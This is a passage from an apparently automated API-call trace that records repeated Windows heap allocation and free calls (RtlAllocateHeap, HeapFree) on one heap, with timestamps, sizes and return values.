dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, 